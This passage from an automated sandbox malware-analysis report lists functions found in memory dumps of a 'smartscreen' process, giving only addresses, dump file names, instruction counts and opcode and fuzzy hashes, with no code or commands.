                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6b8b0d687b7c17ddb86b58a920d614945960880f08bfca05b146629ab970aa66
                                                                                                      • Instruction ID: f7902033dc0a089c632ac077feedc51320c965d9eecd69f7a6ab8e0db0c3cc70
                                                                                                      • Opcode Fuzzy Hash: 6b8b0d687b7c17ddb86b58a920d614945960880f08bfca05b146629ab970aa66
                                                                                                      • Instruction Fuzzy Hash: 62014F7090968C8FDB96DF64C869AA97FB0FF59300F0506EBD40DC71A2D7359994CB41
                                                                                                      Function 00007FFD9B8984D5 Relevance: .0, Instructions: 42COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B895000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B895000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b895000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 26111d65f34c7a7ba8e7ac3e85c247ec89da3e3d2f09eda01b85ba0d1c5700e7
                                                                                                      • Instruction ID: e7fefcb003aaca0042df440364715f4601a70f20bdec3815febe56f8fe08684b
                                                                                                      • Opcode Fuzzy Hash: 26111d65f34c7a7ba8e7ac3e85c247ec89da3e3d2f09eda01b85ba0d1c5700e7
                                                                                                      • Instruction Fuzzy Hash: A0018B71918A8D8FDF54DF18C8555E93BE1FF28344F4501AAE848C3292D738E694CB82
                                                                                                      Function 00007FFD9B8CA3B9 Relevance: .0, Instructions: 41COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B8C7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b8c7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 05ca5f2abb5684f59707eb54e78a36de6373d1be21f371a93147f49ab575092a
                                                                                                      • Instruction ID: 168d16455a7261d9f62886bf745e7aa6bb9002834c3136c33a9676d33bd7e862
                                                                                                      • Opcode Fuzzy Hash: 05ca5f2abb5684f59707eb54e78a36de6373d1be21f371a93147f49ab575092a
                                                                                                      • Instruction Fuzzy Hash: 8B017C7090868C8FCB86EF24C868AA97FB0FF29300F0500DBD448C71A2D7359994CB41
                                                                                                      Function 00007FFD9B8D3B09 Relevance: .0, Instructions: 41COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B8C7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b8c7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c8787e95da067077ec480993774adc139ed67c07473fde2c7dd5b38bf3569b81
                                                                                                      • Instruction ID: 5f178abb0ffd36b2c22ffd7d9b9b6294dea1f07de1dc6fd5933f64203a4489ce
                                                                                                      • Opcode Fuzzy Hash: c8787e95da067077ec480993774adc139ed67c07473fde2c7dd5b38bf3569b81
                                                                                                      • Instruction Fuzzy Hash: F5014B31A0968D8FDB85DF68C8546E97BB0FF59300F0506AAD419C72A2DB349A44CB41
                                                                                                      Function 00007FFD9B8D9C39 Relevance: .0, Instructions: 39COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B8C7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b8c7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8ccef6e536fe05d288f1f9e040d0b9cbaa416a8815ce2f33948df129316566ad
                                                                                                      • Instruction ID: 2c57c6f6d37414aa38901ddd6dfb17c27ed55a8ba0898d711623d0ca538df6ef
                                                                                                      • Opcode Fuzzy Hash: 8ccef6e536fe05d288f1f9e040d0b9cbaa416a8815ce2f33948df129316566ad
                                                                                                      • Instruction Fuzzy Hash: 6F014F3090968D8FCB95DF64C869A997FF0FF59300F4501EBD409C71A2D7359994CB41
                                                                                                      Function 00007FFD9B8D5AA9 Relevance: .0, Instructions: 38COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B8C7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b8c7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f31f72070c2e082a0c814a855f554c2823f046f918e7b245e0f13752971594a8
                                                                                                      • Instruction ID: 71a7f43fd4819ff0cf21360f5b0b0bfbbd07137ba803cff421c660a2017d68bf
                                                                                                      • Opcode Fuzzy Hash: f31f72070c2e082a0c814a855f554c2823f046f918e7b245e0f13752971594a8
                                                                                                      • Instruction Fuzzy Hash: 5A01A27190E3C94FEB659F6488A56E83FB0FF15200F0902FBD458C60E7DA3855448702
                                                                                                      Function 00007FFD9B8CC9E0 Relevance: .0, Instructions: 38COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B8C7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b8c7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f9fcd51a69c60c7fa55e85f864fe4f99bcaeb3372f6b6b5d9811fb7932bf04c0
                                                                                                      • Instruction ID: 5e92b507337a565f71979c0bbded389ccc625761c9d3111dd39c21617b915f37
                                                                                                      • Opcode Fuzzy Hash: f9fcd51a69c60c7fa55e85f864fe4f99bcaeb3372f6b6b5d9811fb7932bf04c0
                                                                                                      • Instruction Fuzzy Hash: 38F0EC70914A4D9FCF44EF58C859AE97BF0FB6C305F00456AE80DD3250DB30A594CB81
                                                                                                      Function 00007FFD9B897CED Relevance: .0, Instructions: 36COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B895000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B895000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b895000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: cce8011bd120bd1b2b29d71790e401530f43f99c8cb52a71cae3cd73b73938ee
                                                                                                      • Instruction ID: c1478ef5166dc1a859ed3c19ac7139db6154e95de6bfdc272ffd0709b0e22930
                                                                                                      • Opcode Fuzzy Hash: cce8011bd120bd1b2b29d71790e401530f43f99c8cb52a71cae3cd73b73938ee
                                                                                                      • Instruction Fuzzy Hash: FCF0903450964D8FCF95DF18C891ADA3FE0FF29340F0101A5E818C71A5D734E965CB81
                                                                                                      Function 00007FFD9B8CA3D0 Relevance: .0, Instructions: 35COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B8C7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b8c7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4eabdf60480f43a3a45506d6fdbf813ac8912eefdd8935f6c9585f61ca83adab
                                                                                                      • Instruction ID: 356112a03c44ff9d39727fa5b1726901b2923b59da4f17f1fc10f1929f4d9220
                                                                                                      • Opcode Fuzzy Hash: 4eabdf60480f43a3a45506d6fdbf813ac8912eefdd8935f6c9585f61ca83adab
                                                                                                      • Instruction Fuzzy Hash: 23F0F93091490D9FCF84EF58C458AEA7BE0FB68305F00409AA40DC3164DB319694CB80
                                                                                                      Function 00007FFD9B8D1230 Relevance: .0, Instructions: 34COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B8C7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b8c7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4a586410c4b3cf208cfa1c6bc0f599d6a6b3eac47c2d8e63a68e169def001484
                                                                                                      • Instruction ID: 4bccea4fecd9da1c83ca471fafe533792a299cf5fa829a7b04b23db58d27620b
                                                                                                      • Opcode Fuzzy Hash: 4a586410c4b3cf208cfa1c6bc0f599d6a6b3eac47c2d8e63a68e169def001484
                                                                                                      • Instruction Fuzzy Hash: 03F01D3090490D9FCF84EF54C454AEA7BF0FF58304F1001AAE41DD3264CB31AA90CB80
                                                                                                      Function 00007FFD9B8D6D38 Relevance: .0, Instructions: 34COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B8C7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b8c7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 1274e175bfee4cd62dbbfdf32b36ba924db9c058e51668e0c465e69e50b7e131
                                                                                                      • Instruction ID: 45e86febc9d7cbb1a23558f7548ab17fa9eab3a827f14ba539a37ea253962870
                                                                                                      • Opcode Fuzzy Hash: 1274e175bfee4cd62dbbfdf32b36ba924db9c058e51668e0c465e69e50b7e131
                                                                                                      • Instruction Fuzzy Hash: 1EF01730A0494D9FCF94EF58C458AEA7BF0FF68304F5005AAE41ED32A4CB31A690CB80
                                                                                                      Function 00007FFD9B8974CD Relevance: .0, Instructions: 32COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B895000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B895000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b895000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a8c7df730c12b0132cef278beaca564fcc357831d10b58148d3d4eab16ceda00
                                                                                                      • Instruction ID: 50ae6ca7d6f051a82a6293c7495ce3188003afca34ea5e9dfdfdf65b8a796a69
                                                                                                      • Opcode Fuzzy Hash: a8c7df730c12b0132cef278beaca564fcc357831d10b58148d3d4eab16ceda00
                                                                                                      • Instruction Fuzzy Hash: 9CF06D34509A8DCFCB91DF18C8556993FE0FF59310F0501A6E41CC7162D734E9A4CB81
                                                                                                      Function 00007FFD9B8D1F85 Relevance: .0, Instructions: 31COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B8C7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b8c7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: db0afe375fdf7310e432dddc2d05feffe6248530b062e7d6c6b3470f95f1f821
                                                                                                      • Instruction ID: 051394d281f41c051147b7ac42737b987c58f56cee89b737ec5256094bf12fe3
                                                                                                      • Opcode Fuzzy Hash: db0afe375fdf7310e432dddc2d05feffe6248530b062e7d6c6b3470f95f1f821
                                                                                                      • Instruction Fuzzy Hash: 10F0A735A0E54C9FDB12DB54C8608E87B21EF96305B1643A2D04D87162CA35AD02C740
                                                                                                      Function 00007FFD9B8898F1 Relevance: .0, Instructions: 30COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B886000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B886000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b886000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d96c1afbb73a333179a9c69d47841b9312259228f6edc349d7172ca6edee078d
                                                                                                      • Instruction ID: ce5c8e89959c6869c4887147c168332546380a69df85e86cc542b26f06e912b5
                                                                                                      • Opcode Fuzzy Hash: d96c1afbb73a333179a9c69d47841b9312259228f6edc349d7172ca6edee078d
                                                                                                      • Instruction Fuzzy Hash: 83F03071E0991D8FEBE5EB1C98686A9A7A1EF5C301F1142FAD02DD2292DE342AC54F01
                                                                                                      Function 00007FFD9B897325 Relevance: .0, Instructions: 29COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B895000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B895000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b895000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e96ec7ed1fc2586f919388c07542aff8ee7f419ea438f8f8ff63dc75a75aae23
                                                                                                      • Instruction ID: 257f1627c27f34a937885be46e218f6776695ec10582013b34c1cabad2f1f19f
                                                                                                      • Opcode Fuzzy Hash: e96ec7ed1fc2586f919388c07542aff8ee7f419ea438f8f8ff63dc75a75aae23
                                                                                                      • Instruction Fuzzy Hash: C3F0A07590D68D9FDF61EB64886D2EC7FF0FF19300F8504AAD808C60A1E6349294DB02
                                                                                                      Function 00007FFD9B8A0C41 Relevance: .0, Instructions: 29COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B89A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B89A000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b89a000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f048aad6020ded2b2e6076d008566569af0403dcd0246a8d3772eb74cee16602
                                                                                                      • Instruction ID: 64b485e957cf46a50cb2032e614e853068f5fe4ee00c7ad119b1f52ec8cd93f7
                                                                                                      • Opcode Fuzzy Hash: f048aad6020ded2b2e6076d008566569af0403dcd0246a8d3772eb74cee16602
                                                                                                      • Instruction Fuzzy Hash: A5F0C470E2925E8EEB64CFD588643BDB6B1BF5C700F118536C40D962A6DB386A42DB10
                                                                                                      Function 00007FFD9B880CD7 Relevance: .0, Instructions: 28COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b880000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f5350fa8f86a920ebd8afde3eac57391d8b427f4f91fd9783c1498aef7a55c4a
                                                                                                      • Instruction ID: b95f0b987ce70c3786141ee37ea3b1c74bd4269044c3eddb8ed8cadaaca5ef0b
                                                                                                      • Opcode Fuzzy Hash: f5350fa8f86a920ebd8afde3eac57391d8b427f4f91fd9783c1498aef7a55c4a
                                                                                                      • Instruction Fuzzy Hash: FDF0C270A0991A8BE714DF84C8943F977B1FF54301F04067AC025932D2CBB86680CB80
                                                                                                      Function 00007FFD9B88E68D Relevance: .0, Instructions: 27COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B88C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B88C000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b88c000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 489793a07b99a04b8a521a1bb9043918981e97b644bbb1ef174b685a2449c33e
                                                                                                      • Instruction ID: 4a2f0d2570130bbde8619a42213164d31f03d3539099532e275840da75376e43
                                                                                                      • Opcode Fuzzy Hash: 489793a07b99a04b8a521a1bb9043918981e97b644bbb1ef174b685a2449c33e
                                                                                                      • Instruction Fuzzy Hash: F8F0823181E78D8FDB51DF24C9655D93FA0FF45300F4501B6E858C61A2DB349554C741
                                                                                                      Function 00007FFD9B8873E8 Relevance: .0, Instructions: 25COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B886000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B886000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b886000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 64f0cf2cdcc458b4beed25cdfe94a98f72964f001bed83bf09ccb67d42f0de73
                                                                                                      • Instruction ID: 70301e1b35569fb17b9503ed0a4ce9f5e8a0628a20fd47eb53b2eb496f2eb5e8
                                                                                                      • Opcode Fuzzy Hash: 64f0cf2cdcc458b4beed25cdfe94a98f72964f001bed83bf09ccb67d42f0de73
                                                                                                      • Instruction Fuzzy Hash: 5FF0FE71E059198BE7A4DB18DC696A977A1EF88345F1041F6901D9A2D6CE342E824F40
                                                                                                      Function 00007FFD9B88E8D5 Relevance: .0, Instructions: 23COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B88C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B88C000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b88c000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6bb33281f12d8617ca13984308fb3743bfa91bbb01a31c8a8a991f47ab58d55e
                                                                                                      • Instruction ID: 4106026021c05c4187b324873238baaf244054f0de8c04524ddcbed8c865980a
                                                                                                      • Opcode Fuzzy Hash: 6bb33281f12d8617ca13984308fb3743bfa91bbb01a31c8a8a991f47ab58d55e
                                                                                                      • Instruction Fuzzy Hash: 3FE0D83284E68D4BE321675088751D83F90FF05300F4A01BAE05C864E3DA285558C742
                                                                                                      Function 00007FFD9B89FF31 Relevance: .0, Instructions: 16COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B89A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B89A000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b89a000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: de200861cd141f841d0159297382c2ac2f5ffa9dd497c8d155f7fbc8a25b637d
                                                                                                      • Instruction ID: 70fccab13a91dcf3fa32f3bc04e8af0fbcf410e8f9351275be48fa78919132d6
                                                                                                      • Opcode Fuzzy Hash: de200861cd141f841d0159297382c2ac2f5ffa9dd497c8d155f7fbc8a25b637d
                                                                                                      • Instruction Fuzzy Hash: 0DD0C262F04D4F47EF1CDA80C8216BD3F62EF14384F400074E42AAA1D9CF2429438740
                                                                                                      Function 00007FFD9B896047 Relevance: .0, Instructions: 15COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B895000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B895000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b895000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3e0d4af2c6ccbc4b1f207a219363600784c6d9e2ac97d85597cc164bd56afb50
                                                                                                      • Instruction ID: f3cd0a7bb58df036751da490109943f5310f1ed602d84b04e9fc7c8ce81f43ad
                                                                                                      • Opcode Fuzzy Hash: 3e0d4af2c6ccbc4b1f207a219363600784c6d9e2ac97d85597cc164bd56afb50
                                                                                                      • Instruction Fuzzy Hash: F9D0EC60D09A998BEBA5DB5488747ACAAA4FB58700F0102A9A04DD2682DB341A808B01

                                                                                                      Non-executed Functions

                                                                                                      Function 00007FFD9B8968B6 Relevance: 6.5, Strings: 5, Instructions: 280COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B895000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B895000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b895000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $%$)$+$`
                                                                                                      • API String ID: 0-1941960537
                                                                                                      • Opcode ID: 28a05adc4603ea3d74cb9fe6c5b9579d937340611f4db10f7bee944f943995c5
                                                                                                      • Instruction ID: a318d07f4c60326cf266ec5117d86ac9404fb913aab533203018ee04d50e1851
                                                                                                      • Opcode Fuzzy Hash: 28a05adc4603ea3d74cb9fe6c5b9579d937340611f4db10f7bee944f943995c5
                                                                                                      • Instruction Fuzzy Hash: A8C10E70A1951D8FDB69DB54C8A4BE8B7B2FF98304F5045F9C01D97295CE35AA81CF40
                                                                                                      Function 00007FFD9B8CEE8B Relevance: 6.4, Strings: 5, Instructions: 114COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B8C7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b8c7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ($+$E$H$n
                                                                                                      • API String ID: 0-1773399086
                                                                                                      • Opcode ID: 32a5c4bbd42a8ced043841bc2c288485353844860a86b44e1016de0a314d74f2
                                                                                                      • Instruction ID: 7a8b9323c5afb0515b83f880b6981614eb3c21bbe53149b84d8e2f960ac95200
                                                                                                      • Opcode Fuzzy Hash: 32a5c4bbd42a8ced043841bc2c288485353844860a86b44e1016de0a314d74f2
                                                                                                      • Instruction Fuzzy Hash: CD51EDB0A0962D8FEB68EF54C8547B9B7F2FB58311F1042BAD10D97295CB34AA85CF41
                                                                                                      Function 00007FFD9B8CF29E Relevance: 5.0, Strings: 4, Instructions: 39COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B8C7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b8c7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: "$j$u$}
                                                                                                      • API String ID: 0-684171762
                                                                                                      • Opcode ID: 621ed7095f79ce2bda9f322c18ca82dc71b74979bad76cb67a86a2f67e293346
                                                                                                      • Instruction ID: f3dbb95bdab3e7bc6620962ea4b70eef9c94e315887c0756156498a50945b45f
                                                                                                      • Opcode Fuzzy Hash: 621ed7095f79ce2bda9f322c18ca82dc71b74979bad76cb67a86a2f67e293346
                                                                                                      • Instruction Fuzzy Hash: A1113370A0922D8BDB68DF44C8547B9B3F2EF98310F1081A6C00D562A5CB34AA85CF81